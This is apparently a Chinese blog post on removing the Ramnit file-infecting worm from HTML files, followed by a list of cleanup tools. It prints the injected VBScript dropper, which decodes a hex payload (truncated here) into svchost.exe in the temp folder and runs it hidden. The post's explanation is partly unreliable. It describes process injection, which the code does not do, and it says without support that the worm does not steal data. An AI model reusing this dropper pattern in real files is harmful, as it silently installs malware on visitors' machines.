HTML感染 DropFileName = “svchost.exe” Ramnit 蠕虫病毒解决办法

说来也是相当奇怪，最近发现网站源码中有大量.html脚本文件，末尾处自动加入了相当多的VBS代码，变成了一个超大的文件。很可怕。显然，这是中了Ramnit感染型病毒。没关系，下面小编就教大家怎么杀死Ramnit感染型病毒。图为中招后的文件内容



<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000........................此处省略N个字符串"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

这串script代码是一串vbs语言的 Ramnit感染型病毒，中了改病毒后你会发现你的本地所有html文档打开后都会有这样一串字符，不仅仅是html文档，连dll文档也会被感染。

当然这种病毒不要太惊慌，因为他只是起到破坏文件的作用，不会有上传隐私，盗号等危害。

这串代码大概意思就是找到svchost.exe这个进程然后注入数据运行，注入的就是后面的进制代码来运行。

这种病毒和其他病毒不同的是这种vbs病毒感染能力非常强，html文件一旦被感染，那么用户只要打开html文档病毒就运行上面改代码导致病毒直接感染到本地电脑全部html文件和dll文件。

解决办法：
一、赛门铁克Ramnit病毒专杀工具（推荐）
扫描速度快，自动清楚病毒，不损坏文件，缺点是自动杀毒，没有提醒与病毒日志。



二、使用火绒杀毒
注：火绒也可以查杀病毒，但是当被扫描的空间非常大时，比如超过了2T空间，软件在杀毒时或错，造成杀毒失败。



三、使用护卫神挂马清理工具
注：当扫描的空间非常大时，比如超过3T空间，此工具不稳定，扫描过程中会自动退出。


病毒源头：

http://www.admin365.cn/thread-45212-1-1.html   DesktopLayer.exe病毒查

http://www.admin365.cn/thread-45211-1-1.html  HTML感染 DropFileName = “svchost.exe” Ramnit 蠕虫病毒解决办法

http://www.admin365.cn/thread-45224-1-1.html   HTML文件自动加入了VBS代码?教你解决Ramnit病毒